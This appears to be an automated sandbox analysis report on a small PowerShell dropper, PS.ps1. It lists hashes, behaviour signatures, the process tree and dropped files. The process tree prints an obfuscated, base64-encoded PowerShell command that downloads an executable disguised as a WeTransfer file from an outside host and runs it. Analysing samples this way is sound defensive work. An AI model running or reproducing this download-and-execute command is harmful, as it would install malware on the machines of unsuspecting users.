0ab6b8351024ac1bd5a7852563a5039135e32c68b528e5d1061722f5d3650999

General

Target

PS.ps1
Size

490B
MD5

a09dc5b1b69075b7b82d656cc0766e30
SHA1

a3a060e7ab02cecfdd115ab415da947146e37193
SHA256

0ab6b8351024ac1bd5a7852563a5039135e32c68b528e5d1061722f5d3650999
SHA512

49dc33d8b67ab387fe2859325cfc47b77f62ba745ca91b0104f23ca3162c4071d3c85e04c119a09cc0ca31a30545a81b1e8ae173f4ccfba5bf4af45ada4d68df

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

8 2136 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

wetransfer64.exe

pid process

1252 wetransfer64.exe

flow	pid	process
8	2136	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

wetransfer64.exe

pid	process
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1536 timeout.exe

pid	process
1536	timeout.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exewetransfer64.exe

pid	process
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
2136	powershell.exe
2136	powershell.exe
2136	powershell.exe
1252	wetransfer64.exe
1252	wetransfer64.exe
1252	wetransfer64.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewetransfer64.exe

description pid process

Token: SeDebugPrivilege 3952 powershell.exe
Token: SeDebugPrivilege 2136 powershell.exe
Token: SeDebugPrivilege 1252 wetransfer64.exe

description	pid	process
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	1252	wetransfer64.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

powershell.exepowershell.execmd.exewetransfer64.execmd.exe

description	pid	process	target process
PID 3952 wrote to memory of 2136	3952	powershell.exe	powershell.exe
PID 3952 wrote to memory of 2136	3952	powershell.exe	powershell.exe
PID 2136 wrote to memory of 3768	2136	powershell.exe	cmd.exe
PID 2136 wrote to memory of 3768	2136	powershell.exe	cmd.exe
PID 3768 wrote to memory of 1252	3768	cmd.exe	wetransfer64.exe
PID 3768 wrote to memory of 1252	3768	cmd.exe	wetransfer64.exe
PID 3768 wrote to memory of 1252	3768	cmd.exe	wetransfer64.exe
PID 1252 wrote to memory of 3212	1252	wetransfer64.exe	cmd.exe
PID 1252 wrote to memory of 3212	1252	wetransfer64.exe	cmd.exe
PID 1252 wrote to memory of 3212	1252	wetransfer64.exe	cmd.exe
PID 3212 wrote to memory of 1536	3212	cmd.exe	timeout.exe
PID 3212 wrote to memory of 1536	3212	cmd.exe	timeout.exe
PID 3212 wrote to memory of 1536	3212	cmd.exe	timeout.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\PS.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYpass -nOP -W 1 -EC IAAJAAkAIAB3AEcARQBUAAkACQAJAAkAIAAdIGgAdAB0AHAAOgAvAC8AdwBlAHQAcgBhAG4AcwBmAGUAcgAtAGMAbwBtAC4AZAB1AGMAawBkAG4AcwAuAG8AcgBnAC8AYQA0ADQAOAA5ADEAYQBkAC8AOQAxADEALgBlAHgAZQAdIAkACQAJACAACQAtAG8AdQBUAEYASQBsAEUACQAgAAkAIAAdICQARQBuAHYAOgB0AEUAbQBwAFwAdwBlAHQAcgBhAG4AcwBmAGUAcgA2ADQALgBlAHgAZQAdICAAIAAgADsAIAAJAAkACQBDAG0AZAAgAAkACQAgAC8AYwAgAAkACQAdICQARQBuAFYAOgB0AGUATQBQAFwAdwBlAHQAcgBhAG4AcwBmAGUAcgA2ADQALgBlAHgAZQAdIA==
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3768

C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1252

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
5⤵
- Suspicious use of WriteProcessMemory
PID:3212

C:\Windows\SysWOW64\timeout.exe
timeout 1
6⤵
- Delays execution with timeout.exe
PID:1536

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
d737fc27bbf2f3bd19d1706af83dbe3f

SHA1
212d219394124968b50769c371121a577d973985

SHA256
b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

SHA512
974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
37ee98107f454b2d8348e9844133cfc2

SHA1
6a8f76dcb091bd05c72e654df105c1cc52c9661e

SHA256
1f9365ee30335c151e2a2acd06bc6be56de75a4daa5ebe78f9b9d47d7a83b6b6

SHA512
80cfc2029ac0ba33e1f4cd113987d277ec56305650bd25ef8727895247d58956bdd76e58a6597462c088fee0acb7117facfc96973688be0facc3fcbf521b5e01

Download Submit
C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
MD5
59df63df48d34fc9d3d9be42e76f6794

SHA1
853952f4a4bfdc0ea2885c766e544370489e683a

SHA256
d44d20adff5359504bb9aeeca5fc1ac855aa374eea0921b0990a41b8d0d777da

SHA512
63b58d35066d11b9e37547dc1dfae084fc679c7354f7623e5e93646a4e897c82ae2d4ef7550b9157c360d217e897d90cbd0e1d1274b308e39d8da26083d08c04

Download Submit
C:\Users\Admin\AppData\Local\Temp\wetransfer64.exe
MD5
59df63df48d34fc9d3d9be42e76f6794

SHA1
853952f4a4bfdc0ea2885c766e544370489e683a

SHA256
d44d20adff5359504bb9aeeca5fc1ac855aa374eea0921b0990a41b8d0d777da

SHA512
63b58d35066d11b9e37547dc1dfae084fc679c7354f7623e5e93646a4e897c82ae2d4ef7550b9157c360d217e897d90cbd0e1d1274b308e39d8da26083d08c04

Download Submit
memory/1252-154-0x0000000005260000-0x000000000529D000-memory.dmp

Filesize
244KB

Download
memory/1252-152-0x0000000005BF0000-0x0000000005BF1000-memory.dmp

Filesize
4KB

Download
memory/1252-157-0x00000000056F0000-0x0000000005BEE000-memory.dmp

Filesize
5.0MB

Download
memory/1252-153-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/1252-150-0x0000000000DE0000-0x0000000000DE1000-memory.dmp

Filesize
4KB

Download
memory/1252-147-0x0000000000000000-mapping.dmp

Download
memory/1536-156-0x0000000000000000-mapping.dmp

Download
memory/2136-126-0x0000000000000000-mapping.dmp

Download
memory/2136-141-0x0000027BE2273000-0x0000027BE2275000-memory.dmp

Filesize
8KB

Download
memory/2136-142-0x0000027BE2276000-0x0000027BE2278000-memory.dmp

Filesize
8KB

Download
memory/2136-140-0x0000027BE2270000-0x0000027BE2272000-memory.dmp

Filesize
8KB

Download
memory/3212-155-0x0000000000000000-mapping.dmp

Download
memory/3768-146-0x0000000000000000-mapping.dmp

Download
memory/3952-125-0x0000027D3A8D3000-0x0000027D3A8D5000-memory.dmp

Filesize
8KB

Download
memory/3952-118-0x0000027D3A910000-0x0000027D3A911000-memory.dmp

Filesize
4KB

Download
memory/3952-123-0x0000027D3A8D0000-0x0000027D3A8D2000-memory.dmp

Filesize
8KB

Download
memory/3952-122-0x0000027D3B400000-0x0000027D3B401000-memory.dmp

Filesize
4KB

Download
memory/3952-162-0x0000027D3A8D6000-0x0000027D3A8D8000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads